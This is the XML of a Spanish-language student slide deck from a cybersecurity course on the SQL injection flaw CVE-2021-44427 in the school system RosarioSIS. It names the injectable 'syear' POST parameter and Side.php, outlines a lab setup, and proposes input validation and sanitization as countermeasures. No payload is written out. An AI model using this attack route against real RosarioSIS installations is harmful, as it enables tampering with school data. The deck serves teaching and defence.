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54b34dc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54b34dc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54b34dc5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54b34dc5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54b34dc5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54b34dc5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Bueno, toda vulnerabilidad debe tener contramedidas para eliminarlas y no permitir mas que se vulneren datos criticos </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rPr lang="es"/>
              <a:t>Obviamente estas medidas deberian ser aplicadas antes de el momento que suceden. Por eso como conclusion, hay que darle importancia al area de seguridad informatica de nuestra organizacion antes de que se exploten vulnerabilidades que ni sabiamos que teniamos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54b34dc5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54b34dc5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Esto se da porque hay una falta de control en los parametros recibidos, lo que nos permite inyectar codigo sql malicioso en el mismo</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Esto expone datos sensibles que obiamente no deberian ser acesibles para los usuarios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Hay que estar atento y tener un area a cargo para aplicar contramedidas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En particulas estos dos archivos habria que sanitizarlos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54b34dc5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54b34dc5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54b34dc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54b34dc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54b34dc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54b34dc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54b34dc5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54b34dc5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54b34dc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54b34dc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57bdebe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57bdebe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7bdebe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7bdebe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7bdebe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57bdebe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57bdebe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57bdebe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youtube.com/watch?v=iMkk6bYkYOQ"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cvedetails.com/cve/CVE-2021-44427/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/francoisjacquet/rosariosis/-/issues/308" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rosariosis.or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ve.mitre.org/"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8308" y="774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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es"/>
            </a:br>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> RosarioSIS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3381750"/>
            <a:ext cx="8520600" cy="1206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s"/>
              <a:t>Ciberseguridad</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es"/>
            </a:br>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Profesor: Matias Mevied</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es"/>
            </a:br>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Integrantes: Laureano Enrique, Facu Antelo, Arakaki Adrian, Ian Crespi</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Desarrollo de la vulnerabilidad 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="Google Shape;120;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="30404" l="0" r="44330" t="8749"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1583750"/>
            <a:ext cx="3923226" cy="2412650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4506775" y="1102700"/>
            <a:ext cx="4144800" cy="38370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es" sz="1600"/>
              <a:t>Una vez levantada la base de datos PostgreSQL</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>Se estudian tablas para poder insertar los datos en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>inyección</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>Creamos las plantillas con datos/valores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>genéricos</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>El entorno queda listo para ver las modificaciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>vía</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>petición</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> POST</a:t>
            </a:r>
            <a:endParaRPr sz="16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Desarrollo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> de la vulnerabilidad 3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="127" name="Google Shape;127;p23" title="Exploit vulnerabilidad sql inyection en RosarioSIS">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2054038" y="1017725"/>
            <a:ext cx="5035925" cy="37769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Contramedidas para esta vulnerabilidad</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="7584900" cy="34164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s"/>
              <a:t>Teniendo en cuenta que l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>a vulnerabilidad se basa en </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>inyectar en una variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(syear) una </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>porción</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t> de código SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-310832" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>etectar si lo que </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>ingresa por la request HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> como variable es realmente un dato esperado que </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>no contiene código malicioso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-310832" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Se desarrolla un </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>método </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>que </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>reciba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>el </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>parámetro que viaja en la request</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-310832" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>controlador de dicha request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> podría verificar si el parámetro que llega tiene una </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>longitud igual a 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> y que sea </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>de tipo INT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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r>
              <a:rPr lang="es"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="81177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sz="1600"/>
              <a:t>Las conclusiones a las que llegamos es que debido a la falta de un control en los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>parámetros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> recibidos (syear), se abre la ventana para realizar una SQL injection. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>Esta misma se puede desarrollar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>permitiéndonos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> modificar y alterar la DB. Como resultado nos da que la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>aplicación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> de RosarioSIS es vulnerable mediante una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>petición</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> POST. Pudiendo exponer datos sensibles o que no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>deberían</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> ser de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>fácil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> acceso para otras personas; como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>también</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> eliminar o manipular datos de personas/cursos maliciosamente,</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>Este error se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>podría</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> solucionar aplicando contramedidas para evitar que estos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>parámetros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> ejecutados realicen acciones que no queremos. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>debería</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> modificar y sanitizar los archivos pertinentes tales como el Side.php y Warehouse.php. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>Así</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>lograrás</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> obtener una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>aplicación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>más</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> segura y no vulnerable.  </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>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Bibliografía</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="7584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8"/>
              <a:t>Links del cve details:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1658" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cvedetails.com/cve/CVE-2021-44427</a:t>
            </a:r>
            <a:endParaRPr sz="1658"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1658"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1658"/>
              <a:t>Link de git: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1658" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://gitlab.com/francoisjacquet/rosariosis/-/issues/308</a:t>
            </a:r>
            <a:endParaRPr sz="1658"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1658"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1658"/>
              <a:t>link de rosarioSIS: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1658" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.rosariosis.org/es/</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720"/>
              <a:t>Introducción</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="2720"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2720"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;61;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="452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Inicialmente buscamos en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>cve.mitre.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de aplicaciones con vulnerabilidades para desarrollar el exploit.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se busco vulnerabilidades del tipo SQL injection, el sistema elegido fue RosarioSIS (un sistema web para colegios/universidades, en las cuales se generan los cursos, materias,notas, etc)</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2" name="Google Shape;62;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5177350" y="661250"/>
            <a:ext cx="3301231" cy="3820975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>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Vulnerabilidad: SQL Injection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vulnerabilidad elegida es una de tipo SQL injection, en este caso la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>página</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> de RosarioSIS nos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>permite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> modificar datos de la base de datos vía una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>petición</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> POST.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>¿Por qué</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>ocurre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> esto?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Esto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>ocurre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> dado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> que el sistema RosarioSIS no tenía controles de los parámetros y estos mismos enviados podían ejecutar código a través del navegador.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65500" y="345100"/>
            <a:ext cx="4234200" cy="1519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Escenario de ataque</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Google Shape;74;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75" name="Google Shape;75;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265500" y="2175800"/>
            <a:ext cx="4045200" cy="2597700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-341947" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>El atacante mediante un navegador puede realizar una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>petición</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> post</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-341947" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>petición</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> se realiza en el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>parámetro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> “syear”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-341947" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Esto afecta al archivo /Side.php</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-341947" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Ataca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> directamente al sistema de rosarioSIS modificando su DB (PostgreSQL) u obteniendo datos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4791025" y="624083"/>
            <a:ext cx="4234200" cy="3853342"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>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2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Set-Up de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>aplicación</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4891600" y="1017725"/>
            <a:ext cx="4144800" cy="38370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es" sz="1600"/>
              <a:t>Se levanta el server de apache web para poder levantar la pagina</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
